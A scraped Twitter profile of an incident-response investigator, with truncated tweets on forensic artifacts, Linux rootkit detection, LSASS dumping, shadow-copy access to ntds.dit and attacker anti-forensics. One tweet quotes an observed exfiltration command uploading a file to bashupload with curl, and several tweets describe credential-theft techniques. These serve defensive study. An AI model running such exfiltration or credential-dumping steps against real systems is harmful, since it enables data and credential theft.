Stephan Berger (@malmoeb) 's Twitter Profile
Stephan Berger

@malmoeb

Head of Investigations @InfoGuardAG
infosec.exchange/@malmoeb

ID: 910694455

linkhttps://dfir.ch/ calendar_today28-10-2012 16:57:26

2,2K Tweet

26,26K Followers

1,1K Following

Stephan Berger (@malmoeb) 's Twitter Profile Photo

This might come in handy as an "Evidence of Execution" artifact, although I'm not sure when exactly DCOM will log this entry (example below from a recent case, showcasing the execution of Advanced IP Scanner by the attacker): Source: Microsoft-Windows-DistributedCOM Event ID:

Stephan Berger (@malmoeb) 's Twitter Profile Photo

This might be a niche persistence mechanism, but during an investigation, I stumbled upon the following file on a Linux server: /home/<user>/.config/autostart/set_trusted.desktop With the following content: [Desktop Entry] Encoding=UTF-8 Exec=/usr/bin/set_trusted.sh Name=Set

Stephan Berger (@malmoeb) 's Twitter Profile Photo

I successfully tested a LSASS dumping technique on a Windows 10 lab machine, which we encountered on a recent Incident Response engagement (no EDR, default Defender installed). The "MiniDumpWriteDump" technique, as described here [1], was successful in writing the LSASS process

I successfully tested a LSASS dumping technique on a Windows 10 lab machine, which we encountered on a recent Incident Response engagement (no EDR, default Defender installed).

The "MiniDumpWriteDump" technique, as described here [1], was successful in writing the LSASS process
Stephan Berger (@malmoeb) 's Twitter Profile Photo

As I'm about to present about Linux Rootkits at the 10th edition of EuskalHack (๐ŸŽ‰), hereโ€™s a nifty trick to detect a userland rootkit that tries to hide its presence by blocking access to /etc/ld.so.preload. We are mounting the filesystem with debugfs (an interactive file

As I'm about to present about Linux Rootkits at the 10th edition of <a href="/EuskalHack/">EuskalHack</a> (๐ŸŽ‰), hereโ€™s a nifty trick to detect a userland rootkit that tries to hide its presence by blocking access to /etc/ld.so.preload.

We are mounting the filesystem with debugfs (an interactive file
Stephan Berger (@malmoeb) 's Twitter Profile Photo

If I were to start a new job at a company, and if I have one (security-related) wish .. If I could pick anything, Iโ€™d ask for a clear naming convention for all computers and servers. Additionally, Iโ€™d want DHCP and security logs to be stored centrally in a SIEM system. That way,

Stephan Berger (@malmoeb) 's Twitter Profile Photo

During various Ivanti Endpoint Manager Mobile investigations (CVE-2025-4428), we (as others in our field) saw that the threat actors dumped heap memory from the Tomcat Java processes usingย jcmd, in order to search the dumped data for sensitive information. Have others seen this

During various Ivanti Endpoint Manager Mobile investigations (CVE-2025-4428), we (as others in our field) saw that the threat actors dumped heap memory from the Tomcat Java processes usingย jcmd, in order to search the dumped data for sensitive information.

Have others seen this
Stephan Berger (@malmoeb) 's Twitter Profile Photo

The screenshot below is from a recent Incident Response case, investigated by my colleague Flo Scheiber. The user "printer" suddenly sprang to life because an attacker brute-forced the VPN login (without Multi-Factor Authentication). This was not the first time a "printer"

The screenshot below is from a recent Incident Response case, investigated by my colleague <a href="/schnee_FLO_cke/">Flo Scheiber</a>. The user "printer" suddenly sprang to life because an attacker brute-forced the VPN login (without Multi-Factor Authentication).

This was not the first time a "printer"
Stephan Berger (@malmoeb) 's Twitter Profile Photo

An attacker downloaded a freely available webshell from GitHub and stored it under the installation path of the legitimate SAP installation in the recent SAP Visual Composer exploitation, "disguised" as a PHPMyAdmin file (see image). The code itself is relatively simple,

An attacker downloaded a freely available webshell from GitHub and stored it under the installation path of the legitimate SAP installation in the recent SAP Visual Composer exploitation, "disguised" as a PHPMyAdmin file (see image).

The code itself is relatively simple,
LETHAL FORENSICS (@lethal_dfir) 's Twitter Profile Photo

We just released MemProcFS-Analyzer v1.2.0 with various enhancements. Check out the changelog for more information. Happy Memory Analysis! #MemProcFS #MemoryAnalysis #DFIR github.com/LETHAL-FORENSIโ€ฆ

Stephan Berger (@malmoeb) 's Twitter Profile Photo

A teammate of mine worked on an interesting incident where the attackers connected to the backup server via RDP, launched the Chrome browser, and searched on Google for "VirtualBox". The VirtualBox installer was then downloaded to the home directory of the compromised user:

Stephan Berger (@malmoeb) 's Twitter Profile Photo

Yesterday, I presented "Anti-Forensic" techniques for Windows and Linux at the Troopers conference in Heidelberg. This morning at breakfast, I was approached by an attendee and asked if I had looked at the zapper tool from The Hacker's Choice. [1] I said no, but of course, my

Yesterday, I presented "Anti-Forensic" techniques for Windows and Linux at the Troopers conference in Heidelberg. This morning at breakfast, I was approached by an attendee and asked if I had looked at the zapper tool from The Hacker's Choice. [1]

I said no, but of course, my
Stephan Berger (@malmoeb) 's Twitter Profile Photo

๐Ÿ›ฌ๐Ÿ‘จโ€๐Ÿซ๐Ÿ›ซ๐Ÿ” I love being a speaker. I also love meeting people, hearing their thoughts, and exchanging ideas. While I was enjoying tapas in the charming old town of Donostia-San Sebastiรกn, I had a lengthy conversation with an elderly gentleman from Glasgow. One of his statements

๐Ÿ›ฌ๐Ÿ‘จโ€๐Ÿซ๐Ÿ›ซ๐Ÿ” I love being a speaker. I also love meeting people, hearing their thoughts, and exchanging ideas.

While I was enjoying tapas in the charming old town of Donostia-San Sebastiรกn, I had a lengthy conversation with an elderly gentleman from Glasgow.

One of his statements
Stephan Berger (@malmoeb) 's Twitter Profile Photo

Remote Connection from 30.1.40[.]64 ๐Ÿ˜ฑ or not ๐Ÿค” After a second look, it turned out, that the customer is using a public IP addressing scheme for internal hosts ๐Ÿ™Š As somebody wrote on the Cisco forum: "Such addressing scheme looks really messy for me, but maybe there are

Remote Connection from 30.1.40[.]64 ๐Ÿ˜ฑ  or not ๐Ÿค” After a second look, it turned out, that the customer is using a public IP addressing scheme for internal hosts ๐Ÿ™Š As somebody wrote on the Cisco forum: "Such addressing scheme looks really messy for me, but maybe there are
Stephan Berger (@malmoeb) 's Twitter Profile Photo

Ever heard of shellbags? Like in the example here: My Computer -> ? -> Users -> <compromised_user> -> ADRecon-Report-20250225235831 Shellbags are a subset of data found within UsrClass.dat and sometimes in the NTUSER.DAT hive. They are used by Windows to remember folder view

Stephan Berger (@malmoeb) 's Twitter Profile Photo

During a recent incident response case, we observed the following file access: \\localhost\C$\@ GMT-2025.06.21-10.53.43\Windows\NTDS\ntds.dit This is a clever method of accessing a Volume Shadow Copy (VSS) snapshot. Many EDR and detection systems typically monitor for commands

During a recent incident response case, we observed the following file access: \\localhost\C$\@ GMT-2025.06.21-10.53.43\Windows\NTDS\ntds.dit  

This is a clever method of accessing a Volume Shadow Copy (VSS) snapshot. Many EDR and detection systems typically monitor for commands
Stephan Berger (@malmoeb) 's Twitter Profile Photo

In a recent incident response case, threat actors escalated from a compromised Ivanti appliance to full Domain Admin privileges in under eight minutes (..!). Once the backdoor was successfully deployed on the Ivanti appliance, the threat actors leveraged their access to request

Stephan Berger (@malmoeb) 's Twitter Profile Photo

During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command: curl bashupload[.]com -T your_file.txt Notably, Palo Alto highlighted this service in a February

During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command:  
curl bashupload[.]com -T your_file.txt

Notably, Palo Alto highlighted this service in a February
Stephan Berger (@malmoeb) 's Twitter Profile Photo

Dear attacker, Clear-History does not clear the PSReadLine command history file. Clear-History, as taken from the official documentation, deletes only entries from the PowerShell session command history. In contrast, the PSReadLine module stores a history file that contains

Dear attacker, Clear-History does not clear the PSReadLine command history file.

Clear-History, as taken from the official documentation, deletes only entries from the PowerShell session command history.

In contrast, the PSReadLine module stores a history file that contains
Stephan Berger (@malmoeb) 's Twitter Profile Photo

What I learnt today: When NetScan is executed with the โ€˜Check for write accessโ€™ option enabled, a โ€˜delete[.]meโ€™ file is created then deleted on discovered shares. [1] Thanks, The DFIR Report - this is exactly what we are seeing in a recent case. I owe you one ๐Ÿป [1]

Stephan Berger (@malmoeb) 's Twitter Profile Photo

Awesome read & technique - well done ๐Ÿ‘ ๐˜๐˜ฏ ๐˜ต๐˜ฉ๐˜ช๐˜ด ๐˜ฃ๐˜ญ๐˜ฐ๐˜จ ๐˜ฑ๐˜ฐ๐˜ด๐˜ต, ๐˜ธ๐˜ฆ ๐˜ต๐˜ข๐˜ญ๐˜ฌ๐˜ฆ๐˜ฅ ๐˜ข๐˜ฃ๐˜ฐ๐˜ถ๐˜ต ๐˜ข ๐˜ฉ๐˜ฐ๐˜ธ ๐˜ข ๐˜ธ๐˜ฆ๐˜ญ๐˜ญ-๐˜ฌ๐˜ฏ๐˜ฐ๐˜ธ๐˜ฏ ๐˜ต๐˜ฆ๐˜ค๐˜ฉ๐˜ฏ๐˜ช๐˜ฒ๐˜ถ๐˜ฆ ๐˜ง๐˜ฐ๐˜ณ ๐˜ฆ๐˜ฏ๐˜ฅ๐˜ฑ๐˜ฐ๐˜ช๐˜ฏ๐˜ต ๐˜ฑ๐˜ฆ๐˜ณ๐˜ด๐˜ช๐˜ด๐˜ต๐˜ฆ๐˜ฏ๐˜ค๐˜ฆ, ๐˜ค๐˜ข๐˜ฏ ๐˜ฃ๐˜ฆ ๐˜ณ๐˜ฆ-๐˜ช๐˜ฏ๐˜ท๐˜ฆ๐˜ฏ๐˜ต๐˜ฆ๐˜ฅ ๐˜ช๐˜ฏ ๐˜ข ๐˜ค๐˜ญ๐˜ฐ๐˜ถ๐˜ฅ ๐˜ฆ๐˜ฏ๐˜ท๐˜ช๐˜ณ๐˜ฐ๐˜ฏ๐˜ฎ๐˜ฆ๐˜ฏ๐˜ต